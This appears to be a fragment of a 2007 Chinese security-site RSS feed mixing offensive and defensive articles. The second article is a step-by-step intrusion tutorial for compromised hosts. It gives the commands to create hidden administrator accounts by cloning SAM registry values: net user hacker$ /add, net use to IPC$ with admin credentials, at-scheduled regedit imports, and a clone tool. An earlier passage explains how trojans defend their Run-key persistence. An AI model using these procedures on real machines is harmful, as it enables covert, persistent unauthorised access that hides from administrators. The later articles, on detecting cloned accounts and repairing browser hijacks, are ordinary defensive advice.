<BR><BR>这是很多Windows程序都采用的方法，也是木马最常用的。使用非常方便，但也容易被人发现，由于其应用太广，所以几乎提到木马，就会让人想到这几个注册表中的主键，通常木马会使用最后一个。使用Windows自带的程序:msconfig或注册表编辑器(regedit.exe，以下简称regedit)都可以将它轻易的删除，所以这种方法并不十分可靠。但可以在木马程序中加一个时间控件，以便实时监视注册表中自身的启动键值是否存在，一旦发现被删除，则立即重新写入，以保证下次Windows启动时自己能被运行。这样木马程序和注册表中的启动键值之间形成了一种互相保护的状态。木马程序未中止，启动键值就无法删除(手工删除后，木马程序又自动添加上了)，相反的，不删除启动键值，下次启动Windows还会启动木马。怎么办呢?其实破解它并不难，即使在没有任何工具软件的情况下也能轻易解除这种互相保护。 <BR><BR>破解方法:首先，以安全模式启动Windows，这时，Windows不会加载注册表中的项目，因此木马不会被启动，相互保护的状况也就不攻自破了;然后，你就可以删除注册表中的键值和相应的木马程序了。 <BR><BR>2、通过HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce， <BR><BR>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce和 <BR><BR>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce <BR><BR>隐蔽性:4星 <BR><BR>应用程度:较低 <BR><BR>应用案例:Happy99 <BR><BR>这种方法好像用的人不是很多，但隐蔽性比上一种方法好，它的内容不会出现在msconfig中。在这个键值下的项目和上一种相似，会在Windows启动时启动，但Windows启动后，该键值下的项目会被清空，因而不易被发现，但是只能启动一次，木马如何能发挥效果呢? <BR><BR>其实很简单，不是只能启动一次吗?那木马启动成功后再在这里添加一次不就行了吗?在Delphi中这不过3、5行程序。虽说这些项目不会出现在msconfig中，但是在Regedit中却可以直接将它删除，那么木马也就从此失效了。 <BR><BR>还有一种方法，不是在启动的时候加而是在退出Windows的时候加，这要求木马程序本身要截获WIndows的消息，当发现关闭Windows消息时，暂停关闭过程，添加注册表项目，然后才开始关闭Windows，这样用Regedit也找不到它的踪迹了。这种方法也有个缺点，就是一旦Windows异常中止(对于Windows9x这是经常的)，木马也就失效了。 <BR><BR>破解他们的方法也可以用安全模式。</P>]]></description>
</item>
<item>
	<title><![CDATA[系统中多种隐藏超级用户方法]]></title>
	<link><![CDATA[http://www.csnic.net:81/n549c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 06:52:46 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>一、如何在图形界面建立隐藏的超级用户<BR><BR>　　图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好，但是较为复杂，还要用到psu.exe(让程序以系统用户身份运行的程序)，如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为Windows2000有两个注册表编辑器：regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序，修改键值的权限时在右键中点“权限”来修改。对regedit.exe我想大家都很熟悉，但却不能对注册表的项键设置权限，而regedt32.exe最大的优点就是能够对注册表的项键设置权限。NT/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下，但是除了系统用户SYSTEM外，其它用户都无权查看到里面的信息，因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下：<BR><BR>　　1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的，首先在命令行下或帐户管理器中建立一个帐户：hacker$,这里我在命令行下建立这个帐户<BR><BR>　　net&nbsp;user&nbsp;hacker$&nbsp;1234&nbsp;/add<BR><BR>　　2、在开始/运行中输入：regedt32.exe并回车来运行regedt32.exe。<BR><BR>　　3、点“权限”以后会弹出窗口<BR><BR>　　点添加将我登录时的帐户添加到安全栏内，这里我是以administrator的身份登录的，所以我就将administrator加入，并设置权限为“完全控制”。这里需要说明一下：最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将会带来一系列不必要的问题。等隐藏超级用户建好以，再来这里将你添加的帐户删除即可。<BR><BR>　　4、再点“开始”→“运行”并输入“regedit.exe”回车，启动注册表编辑器regedit.exe。打开键：<BR><BR>　　HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"<BR><BR>　　5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键“F”的值复制，并覆盖hacker$对应的项00000409下的键“F”的值,然后再将00000409.reg与hacker.reg合并。<BR><BR>　　6、在命令行下执行net&nbsp;user&nbsp;hacker$&nbsp;/del将用户hacker$删除：<BR><BR>　　net&nbsp;user&nbsp;hacker$&nbsp;/del<BR><BR>　　7、在regedit.exe的窗口内按F5刷新，然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可<BR><BR>　　8、到此，隐藏的超级用户hacker$已经建好了，然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。<BR><BR>　　9、注意：隐藏的超级用户建好后，在帐户管理器看不到hacker$这个用户，在命令行用“net&nbsp;user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net&nbsp;user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。<BR>　二、如何在命令行下远程建立隐藏的超级用户<BR><BR>　　在这里将用at的命令，因为用at产生的计划任务是以系统身份运行的，所以也用不到psu.exe程序。为了能够使用at命令，肉鸡必须开有schedule的服务，如果没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程启动，当然其方法也可以，只要能启动schedule服务就行。<BR><BR>　　对于命令行方式，你可以采用各种连接方式，如用SQLexec连接MSSQL的1433端口，也可以用telnet服务，只要以你能得到一个cmdshell，并且有运行at命令的权限就可以。<BR><BR>　　1、首先找到一台肉鸡，至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡，现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机，我将它的ip地址改为13.50.97.238,，请勿在互联网上对号入座,以免骚扰正常的ip地址。</P>
<P>2、先与肉鸡建立连接,命令为：net&nbsp;use&nbsp;13.50.97.238ipc$&nbsp;"12345678"&nbsp;/user:"administrator<BR><BR>　　3、用at命令在肉鸡上建立一个用户(如果at服务没有启动，可用小榕的netsvc.exe或sc.exe来远程启动)：<BR><BR>　　at&nbsp;13.50.97.238&nbsp;12:51&nbsp;c:\winntsystem32net.exe&nbsp;user&nbsp;hacker$&nbsp;1234&nbsp;/add<BR><BR>　　建立这个加有$符的用户名，是因为加有$符后，命令行下用net&nbsp;user将不显示这个用户，但在帐户管理器却能看到这个用户。<BR><BR>　　4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值：<BR><BR>　　at&nbsp;13.50.97.238&nbsp;12:55&nbsp;c:\winntregedit.exe&nbsp;/e&nbsp;hacker.reg<BR><BR>　　HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers<BR><BR>　　/e&nbsp;是regedit.exe的参数，在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将“c:\winntregedit.exe&nbsp;/e&nbsp;hacker.reg&nbsp;HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起来。<BR><BR>　　5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为：<BR><BR>　　copy&nbsp;13.50.97.238admin$system32hacker.reg&nbsp;c:\hacker.reg<BR><BR>　　修改的方法图形界中已经介绍过了，这里就不作介绍了。<BR><BR>　　6、再将编辑好的hacker.reg拷回肉鸡上<BR><BR>　　copy&nbsp;c:\hacker.reg&nbsp;13.50.97.238admin$system32hacker1.reg<BR><BR>　　7、查看肉鸡时间：net&nbsp;time&nbsp;13.50.97.238&nbsp;然后用at命令将用户hacker$删除：<BR><BR>　　at&nbsp;13.50.97.238&nbsp;13:40&nbsp;net&nbsp;user&nbsp;hacker$&nbsp;/del<BR><BR>　　8、验证hacker$是否删除：用<BR><BR>　　net&nbsp;use&nbsp;13.50.97.238&nbsp;/del&nbsp;断开与肉鸡的连接。<BR><BR>　　net&nbsp;use&nbsp;13.50.97.238ipc$&nbsp;"1234"&nbsp;/user:"hacker$"&nbsp;用帐户hacker$与肉鸡连接，不能连接说明已删除。<BR><BR>　　9、再与肉鸡建立连接：net&nbsp;use&nbsp;13.50.97.238ipc$&nbsp;"12345678"&nbsp;/user:"administrator"再取得肉鸡时间，用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表：<BR><BR>　　at&nbsp;13.50.97.238&nbsp;13:41&nbsp;c:winntregedit.exe&nbsp;/s&nbsp;hacker1.reg<BR><BR>　　regedit.exe的参数/s是指安静模式。<BR><BR>　　10、再验证hacker$是否已建立，方法同上面验证hacker$是否被删除一样。<BR><BR>　　11、再验证用户hacker$是否有读、写、删的权限，如果不放心，你还可验证是否能建立其它帐户。<BR><BR>　　12、通过11可以断定用户hacker$具有超级用户权限，因为最初我用at命令建立它的时候是一个普通用户，而现在却具有远程读、写、删的权限。 </P>
<P></P>
<P>　三、如果肉鸡没有开3389终端服务，而我又不想用命令行，怎么办?<BR><BR>　　这种情况下，你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能，你可以用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能，你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似，我就不多说了，只它的速度实在是令人难以忍受。<BR><BR>　　是这里有两个前提：1、先用net&nbsp;use&nbsp;肉鸡ipipc$&nbsp;"密码"&nbsp;/user:"超级用户名"来与远程主机建立连接以后，才能用regedit.exe&nbsp;regedt32.exe及帐户管理器与远程主机连接。<BR><BR>　　2、远程主机必须开启远程注册表服务(没有开启的话，你也可以远程开启，因为你有超级用户的密码了)。<BR><BR>　　四、利用被禁用的帐户建立隐藏的超级用户<BR><BR>　　1、想办查看有哪些用户被细心的管理员禁止，一般情况下，有些管理员出于安全考虑，通常会将guest禁用，当然了会禁用其它用户。在图形界面下，非常容易，只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下，我还没有想到好的办法，只能在命令行下用命令：“net&nbsp;user&nbsp;用户名”一个一个来查看用户是否被禁用。</P>
<P>2.在这里，我们假设用户hacker被管理员禁用。首先，我先用小榕的超组用户克隆程序CA.exe，将被禁用的用户hacker&nbsp;克隆成超级用户(克隆之后，被禁用的用户hacker就会自动被激活了)：&nbsp;CA.EXE&nbsp;肉鸡ip&nbsp;Administrator&nbsp;超级用户密码&nbsp;hacher&nbsp;hacher密码。<BR><BR>　　3.如果你现在一个cmdshell，如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以，这时你只要输入命令：<BR><BR>　　net&nbsp;user&nbsp;hacker&nbsp;/active:no<BR><BR>　　这样用户hacker就被禁用了(至少表面上是这样的)，当然你也可以将用户hacher换成其它的被禁用的用户。<BR><BR>　　4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了，但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令：net&nbsp;user&nbsp;肉鸡ipipc$&nbsp;"hacker密码"&nbsp;/user:"hacker"&nbsp;连一连看看。我可以告诉大家，经过我多次试验，次次都能成功，而且还是超级用户权限。<BR><BR>　　5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式：at&nbsp;肉鸡ip&nbsp;时间&nbsp;net&nbsp;user&nbsp;hacker&nbsp;/active:no<BR><BR>　　6.原理：具体的高深的原理我也说不上来，我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看，肯定会弹出一对话框，并禁止你继续禁用超级用户administrator，同样，因为在克隆时，hacker在注册表的“F”键被超级用户administrator在注册表的“F”键所替代，因而hacker就具有了超级用户的权限了，但是由于hacker在注册表内“C”健还是原来的“C”键，所以hacker还是会被禁用，但是它的超级用户权限却不会被禁用，因此被禁用的用户hacker还是可以连接肉鸡，而且还具有超级用户的权限。具体我也说不明白，大家权且这么理解吧。<BR><BR>　　五、注意的几点事项<BR><BR>　　1、隐藏的超级用户建立以后，在帐户管理器中和命令行下均看不到这个用户，但这个用户却存在。<BR><BR>　　2、隐藏的超级用户建立以后，就不能再修改密码了，因为一旦修改密码，这个隐藏的超级用户就会暴露在帐户管理器中，而且不能删除。3、如在本机上试验时，最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份，因为本人做试验时，曾出现过帐户管理器中看不到任何用户，组中也看不到任何组的现象，但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。<BR><BR>　　4、本方法在2000/XP上测试通过，未在NT上测试。</P>]]></description>
</item>
<item>
	<title><![CDATA[用简单的命令检查电脑是否被安装木马]]></title>
	<link><![CDATA[http://www.csnic.net:81/n548c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 06:51:34 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P><FONT size=2>一些基本的命令往往可以在保护网络安全上起到很大的作用，下面几条命令的作用就非常突出。 <BR><BR>　　检测网络连接 <BR><BR>　　如果你怀疑自己的计算机上被别人安装了木马，或者是中了病毒，但是手里没有完善的工具来检测是不是真有这样的事情发生，那可以使用Windows自带的网络命令来看看谁在连接你的计算机。具体的命令格式是：netstat -an这个命令能看到所有和本地计算机建立连接的IP，它包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。通过这个命令的详细信息，我们就可以完全监控计算机上的连接，从而达到控制计算机的目的。 <BR><BR>　　禁用不明服务 <BR><BR>　　很多朋友在某天系统重新启动后会发现计算机速度变慢了，不管怎么优化都慢，用杀毒软件也查不出问题，这个时候很可能是别人通过入侵你的计算机后给你开放了特别的某种服务，比如IIS信息服务等，这样你的杀毒软件是查不出来的。但是别急，可以通过“net start”来查看系统中究竟有什么服务在开启，如果发现了不是自己开放的服务，我们就可以有针对性地禁用这个服务了。方法就是直接输入“net start”来查看服务，再用“net stop server”来禁止服务。 <BR><BR>　　轻松检查账户 <BR><BR>　　很长一段时间，恶意的攻击者非常喜欢使用克隆账号的方法来控制你的计算机。他们采用的方法就是激活一个系统中的默认账户，但这个账户是不经常用的，然后使用工具把这个账户提升到管理员权限，从表面上看来这个账户还是和原来一样，但是这个克隆的账户却是系统中最大的安全隐患。恶意的攻击者可以通过这个账户任意地控制你的计算机。为了避免这种情况，可以用很简单的方法对账户进行检测。 <BR><BR>　　首先在命令行下输入net user，查看计算机上有些什么用户，然后再使用“net user+用户名”查看这个用户是属于什么权限的，一般除了Administrator是administrators组的，其他都不是!如果你发现一个系统内置的用户是属于administrators组的，那几乎肯定你被入侵了，而且别人在你的计算机上克隆了账户。快使用“net user用户名/del”来删掉这个用户吧！</FONT></P>]]></description>
</item>
<item>
	<title><![CDATA[QQ在线安全检查-有效清除QQ盗号木马]]></title>
	<link><![CDATA[http://www.csnic.net:81/n547c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 06:50:54 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P><STRONG>免费QQ在线安全检查<BR></STRONG>QQ在线安全检查是针对当前QQ帐号被盗问题提供的免费在线安全检查服务。<BR>该服务将能有效地扫描及清除盗取QQ密码的木马病毒。<BR>扫描和清除QQ盗号木马，根据您的计算机情况，此过程需要几十秒到几分钟。<BR><BR>点击进入：<A href="http://safe.qq.com/cgi-bin/tso/show_tso?intype=0" target=_blank><FONT color=#800080><U>http://safe.qq.com/cgi-bin/tso/show_tso?intype=0</U></FONT></A><BR><BR>腾讯发布的公告：<BR>------------------------------------<BR>应广大QQ用户的强烈需要和热心建议,我们现在特别推出QQ在线安全检查服务.QQ在线安全检查可以发现和清除当前绝大部分的盗号木马病毒,有效保障QQ的安全使用. <BR>在您每次登陆QQ前,可先进入在线安全检查网页http://safe.qq.com/tso(您可以将此网页添加至收藏夹),查看电脑上是否存在盗号威胁.安全检查服务会每日更新,以保证查杀最新出现的盗号木马病毒.&nbsp; &nbsp;<BR>另外,需要提醒您的是:QQ在线安全检查只检测威胁QQ安全的盗号木马.对于其他木马和病毒,推荐您使用其他专业厂商提供的防病毒产品对电脑进行彻底的检查和防护、绿色安全、健康有序的网络环境需要每一个网民的参与和配合.感谢您对腾讯长久以来的支持,愿腾讯QQ能带给您更健康安全的在线生活体验.</P>]]></description>
</item>
<item>
	<title><![CDATA[从QQ号被盗说起 让PC确保安全的4种方法]]></title>
	<link><![CDATA[http://www.csnic.net:81/n546c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 06:49:59 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>现如今，无论是个人用户还是企业用户都非常重视计算机的安全性，木马、钓鱼网站、病毒让互联网中的电脑每时每刻都在受到威胁。有些朋友会问加强电脑的安全性真的有必要吗？其实本文中的小李在中毒之前与您的想法是一样的，但通过一件事让小李对电脑的安全性有了更强的意识。 </P>
<P>　　一个QQ号的丢失引起的警惕 </P>
<P>　　从2000年小李由一个不懂计算机的菜鸟开始向虚拟的互联网接触，也是自那时起他学习并使用了聊天工具，也随之有了一个自己的QQ号。通过上网聊天小李结识了很多朋友，除此之外他从互联网上也学到了不少知识，自此互联网成为他生活中的一部分。 </P>
<P>　　经过一段磨炼的小李虽然已经掌握了操作电脑的基本技术，但他对系统的安全意识非常的淡薄。据他回忆说2000年，他的电脑配置是P3 800+128MB内存+20GB硬盘，本身电脑速度就慢，如果在运行杀毒程序基本上就不用干别的了。当时的操作系统还是基于Windows98，一次有一位朋友来他家做客，发现他的电脑速度比正常情况下还慢，于是朋友从家里带来了一款杀毒软件，经过检测从计算机C盘就查出1万多个病毒，这还不包括其他的分区。 </P>
<P>　　格式化C盘：因为机器里面并没有太多的数据资料，因此第一次的病毒入侵并没有让小李过多去在意。也是从这次开始，他清除病毒的解决方法就是格式化C盘。 </P>
<P>　　系统还原：随着时间飞逝，更多的操作让系统注册表不断庞大，再加上病毒的入侵让系统频繁崩溃。格式化已经不能解决根本问题，一边又一遍安装应用软件既费时又费力，于是小李选择了当系统安装完成之后使用GHOST备份系统及安装程序，这样在恢复时就可以节约很多的时间。 </P>
<P>　　谈到安全性个人电脑被攻击的目标往往小于商务、企业单位，小李毕业后参加了工作，在工作的这段日子里意想不到的事情发生了。刚刚下班回家的小李在家上网时发现自己的QQ密码错误。这时他已经意识到QQ密码被盗了，回到单位后他发现自己所用的工作机已经感染了特洛伊木马，如果要想找回密码只能通过QQ密码保护申请了。 </P>
<P>　　其实一个QQ号的价值并没有很高，但丢失的不仅仅是一个号码，更重要的是里面多年积攒的好友和客户，当然小李因为申请了密码保护才可以让号码失而复得，如果没有申请密码保护恐怕很难再找回来了。 </P>
<P>　　以上我们例举的这个小李的实例在我们生活中大家经常会遇到，不光是QQ密码丢失，网银帐号被盗也是常事。QQ大盗、特洛伊木马、蠕虫病毒等这些黑客软件成为影响计算机安全的罪魁祸首。 </P>
<P>　　常见的病毒的传播途径 </P>
<P>　　目前病毒的传播途径主要有：Internet传播、局域网传播、移动存储设备传播、无线传播等四种主要方式。 </P>
<P>　　Internet既方便又快捷，不仅提高人们的工作效率，而且降低运作成本，逐步被人们所接受并得到广泛的使用。商务来往的电子邮件，还有浏览网页、下载软件、即时通讯软件、网络游戏等等，都是通过互联网这一媒介进行。如此频繁的使用率，注定备受病毒的“青睐”。 </P>
<P>　　1.通过电子邮件传播:电子邮件无论是个人还是商务都是传递信息的桥梁，也成为了病毒的载体。最常见的是当用户接收到邮件之后，病毒或木马程序经过下载之后会自动下载到本地开始运行，FTP下载和BBS文件区也是病毒传播的主要形式。 </P>
<P>　　解决方法：安装邮件防火墙、下载附件时不要运行.exe文件，对大容量不明文件进行直接屏蔽或删除。 </P>
<P>　　2.通过浏览网页和下载软件传播: </P>
<P>　　很多网友都遇到过这样的情况，在浏览过某网页之后，IE标题便被修改了，并且被强制安装了一些插件程序，每次打开IE都被迫登陆某一固定网站，有的还被禁止恢复还原，这便是恶意代码在作怪。当你的IE被修改，注册表不能打开了，开机后IE疯狂地打开窗口，被强制安装了一些不想安装的软件，那末肯定是中了恶意网站或恶意软件的毒了，有些病毒我们也称为流氓软件。 </P>
<P>　　解决方法：不要浏览一些不健康网站或误入一些黑客站点，访问这些站点的同时或单击其中某些链接如果出现下载软件提示时，选择不安装，或者将该页面强制关闭。 </P>
<P>　　3.通过即时通讯软件传播: </P>
<P>　　在我国IM软件可以说是网民使用率最高的软件之一，像MSN、QQ已经成为日常工作及。由于用户数量众多，再加上即时通讯软件本身的安全缺陷，使病毒及黑客软件成为它们捕捉的目标。早些时候针对QQ的病毒、木马较多，而近年来针对MSN的病毒也逐渐多起来，虽然各款及时通讯软件将自己的软件版本不断升级，但截至目前通过QQ来进行传播的病毒已达上百种。 </P>
<P>　　解决方法：使用官方版本的及时通讯软件，不要使用外挂程序，定期将自己的病毒库进行更新升级。 </P>
<P>　　4.通过网络游戏传播: </P>
<P>　　网络游戏已经成为人们缓解生活压力的一种消遣方式。对于游戏玩家来说，网络游戏中最重要的就是装备、道具等这些虚拟物品了，这些装备会随着时间的积累而成为一种有真实价值的东西，因此出现了针对这些虚拟物品的交易，从而出现了偷盗虚拟物品的现象。因此特洛伊木马(Trojan horse)成为菜鸟和不法分子的最爱。 </P>
<P>　　解决方法：用户如果在家中上网需要安装杀毒软件及防火墙并定期更新，如果是在网吧或公共场所上网建议选择有杀毒软件的电脑使用。 </P>
<P>　　最近流行的病毒及木马程序 </P>
<P>　　像前一段流行的熊猫烧香这样的蠕虫病毒，不但对用户系统进行破坏，导致大量应用软件无法使用，还可删除扩展名为gho的所有文件，造成用户系统备份文件丢失，从而无法进行系统恢复，还能终止大量反病毒软件进程。除此之外，继熊猫烧香之后灰鸽子也成为威胁用户计算机安全的一个破坏程序，灰鸽子是国内一款著名后门程序，其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。 </P>
<P>　　如何提高电脑的安全性 </P>
<P>　　先说一下个人用户，我们建议使用正版的杀毒软件及应用程序，一些免费的程序建议从国内知名的软件站去下载，如：华军、天空、驱动之家等。其次避免浏览一些不良网站及论坛，最后在使用移动设备时应该先使用电脑中的杀毒软件查一遍毒，确保安全后再使用。其次是网吧及企业用户，因为整个网络主要是以局域网构成，因此一旦一台电脑被感染中毒之后，病毒很快就会被传播。因此建议这类用户使用企业版杀毒软件并同一进行定期更新，关闭操作系统中不常用到的服务选项，屏蔽一些可能被入侵的端口，如果发现网内有一台电脑中病毒之后应及时与其他电脑进行隔离。总而言之，定期更新杀毒软件的病毒库是关键。 </P>
<P>　　病毒入侵后的挽救方法 </P>
<P>　　在病毒入侵后，我们应先用杀毒软件进行杀毒，然后将电脑中的数据用磁盘或者是光盘等存储介质保存起来。假如病毒已经感染操作系统本身，而无法用原有的操作系统进行杀毒，建议尝试将硬盘拆下（设置成从盘）挂到另外一台机器上进行杀毒操作。如果是硬盘分区表被破坏，建议用分区表恢复软件修复。 </P>
<P>　　总结： </P>
<P>　　只要您使用计算机接触互联网，就很有可能被病毒感染。照片、文档、资料或者是聊天工具相信对您都有一定的意义及价值，不要等它们丢失或损坏了才去想办法补救，到那时就来不及了。</P>]]></description>
</item>
<item>
	<title><![CDATA[上网遇到恶意网页时的现象及处理办法]]></title>
	<link><![CDATA[http://www.csnic.net:81/n545c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 06:48:17 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>　　<STRONG>1.禁止使用电脑</STRONG> <BR>　　<FONT color=#ff0000>现象描述:</FONT>尽管网络流氓们用这一招的不多，但是一旦你中招了，后果真是不堪设想!浏览了含有这种恶意代码的网页其后果是:"关闭系统"、"运行"、"注销"、注册表编辑器、DOS程序、运行任何程序被禁止，系统无法进入"实模式"、驱动器被隐藏。 <BR>　　<FONT color=#0000ff>解决办法:</FONT>一般来说上述八大现象你都遇上了的话，基本上系统就给"废"了，建议重装。 <BR>　　<B>2.格式化硬盘</B> <BR>　　<FONT color=#ff0000>现象描述:</FONT>这类恶意代码的特征就是利用IE执行ActiveX的功能，让你无意中格式化自己的硬盘。只要你浏览了含有它的网页，浏览器就会弹出一个警告说"当前的页面含有不安全的ctiveX，可能会对你造成危害"，问你是否执行。如果你选择"是"的话，硬盘就会被快速格式化，因为格式化时窗口是最小化的，你可能根本就没注意，等发现时已悔之晚矣。 <BR>　　<FONT color=#0000ff>解决办法:</FONT>除非你知道自己是在做什么，否则不要随便回答"是"。该提示信息还可以被修改，如改成"Windows正在删除本机的临时文件，是否继续"，所以千万要注意!此外，将计算机上Format.com、Fdisk.exe、Del.exe、Deltree.exe等命令改名也是一个办法。 <BR>　　<B>3.下载运行木马程序</B> <BR>　　<FONT color=#ff0000>现象描述:</FONT>在网页上浏览也会中木马?当然，由于IE5.0本身的漏洞，使这样的新式入侵手法成为可能，方法就是利用了微软的可以嵌入exe文件的eml文件的漏洞，将木马放在eml文件里，然后用一段恶意代码指向它。上网者浏览到该恶意网页，就会在不知不觉中下载了木马并执行，其间居然没有任何提示和警告! <BR>　　<FONT color=#0000ff>解决办法:</FONT>第一个办法是升级您的IE5.0，IE5.0以上版本没这毛病;此外，安装金山毒霸、Norton等 <BR><FONT color=#0000ff><U>病毒</U></FONT>防火墙，它会把网页木马当作病毒迅速查截杀。 <BR>　　<B>4. <BR><FONT color=#0000ff><U>注册表</U></FONT>的锁定</B> <BR>　　<FONT color=#ff0000>现象描述:</FONT>有时浏览了恶意网页后系统被修改，想要用Regedit更改时，却发现系统提示你没有权限运行该程序，然后让你联系管理员。晕了!动了我的东西还不让改，这是哪门子的道理! <BR>　　<FONT color=#0000ff>解决办法:</FONT>能够修改注册表的又不止Regedit一个，找一个注册表编辑器，例如:Reghance。将注册表中的HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值"DisableRegistryTools"键值恢复为"0"，即可恢复注册表。 <BR>　　<B>5.默认主页修改</B> <BR>　　<FONT color=#ff0000>现象描述:</FONT>一些网站为了提高自己的访问量和做广告宣传，利用IE的漏洞，将访问者的IE不由分说地进行修改。一般改掉你的起始页和默认主页，为了不让你改回去，甚至将IE选项中的默认主页按钮变为失效的灰色。不愧是网络流氓的一惯做风。 <BR>　　<FONT color=#0000ff>解决办法:</FONT>1.起始页的修改。展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main，在右半部分窗口中将"Start Page"的键值改为"about:blank"即可。同理，展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main，在右半部分窗口中将"Start Page"的键值改为"about:blank"即可。 <BR>　　注意:有时进行了以上步骤后仍然没有生效，估计是有程序加载到了启动项的缘故，就算修改了，下次启动时也会自动运行程序，将上述设置改回来，解决方法如下: <BR>　　运行注册表编辑器Regedit.exe，然后依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主键，然后将下面的"registry.exe"子键(名字不固定)删除，最后删除硬盘里的同名可执行程序。退出注册编辑器，重新启动计算机，问题就解决了。 <BR>　　2.默认主页的修改。运行注册表编辑器，展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\，将Default-Page-URL子键的键值中的那些恶意网站的网址改正，或者设置为IE的默认值。 <BR>　　3.IE选项按钮失效。运行注册表编辑器，将HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel中的DWORD值"Settings"=dword:1、"Links"=dword:1、"SecAddSites"=dword:1全部改为"0"，将HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值"homepage"的键值改为"0"。 <BR>　<B>6.篡改IE标题栏</B> <BR>　　<FONT color=#ff0000>现象描述:</FONT>在系统默认状态下，由应用程序本身来提供标题栏的信息。但是，有些网络流氓为了达到广告宣传的目的，将串值"Windows Title"下的键值改为其网站名或更多的广告信息，从而达到改变IE标题栏的目的。非要别人看他的东西，而且是通过非法的修改手段，除了"无耻"两个字，再没有其它形容词了。 <BR>　　<FONT color=#0000ff>解决办法:</FONT>展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\下，在右半部分窗口找到串值"Windows Title"，将该串值删除。重新启动计算机。 <BR>　　<B>7.篡改默认搜索引擎</B> <BR><BR>　　<FONT color=#ff0000>现象描述:</FONT>在IE浏览器的工具栏中有一个搜索引擎的工具按钮，可以实现网络搜索，被篡改后只要点击那个搜索工具按钮就会链接到网络注氓想要你去的网站。 <BR>　　<FONT color=#0000ff>解决办法:</FONT>运行注册表编辑器，依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch和HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant,将CustomizeSearch及SearchAssistant的键值改为某个搜索引擎的网址即可。 <BR>　　<B>8.IE右键修改</B> <BR>　　<FONT color=#ff0000>现象描述:</FONT>有的网络流氓为了宣传的目的，将你的右键弹出的功能菜单进行了修改，并且加入了一些乱七八糟的东西，甚至为了禁止你下载，将IE窗口中单击右键的功能都屏蔽掉。 <BR>　　<FONT color=#0000ff>解决办法:</FONT>1.右键菜单被修改。打开 <BR><FONT 